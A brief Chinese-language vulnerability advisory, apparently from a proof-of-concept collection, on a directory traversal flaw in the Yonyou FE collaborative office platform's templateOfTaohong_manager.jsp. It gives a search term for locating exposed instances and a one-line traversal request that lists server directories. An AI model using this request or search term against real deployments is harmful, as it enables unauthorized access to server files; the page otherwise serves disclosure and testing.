# 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

# 漏洞描述

用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞，通过漏洞攻击者可以获取目录文件等信息，导致进一步攻击

# 漏洞影响

用友 FE协作办公平台

# 网络测绘

"FE协作"

# 漏洞复现

登录页面

验证POC

/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

1

万户OA fileUpload.controller 任意文件上传漏洞用友 U8 cloud upload.jsp 任意文件上传漏洞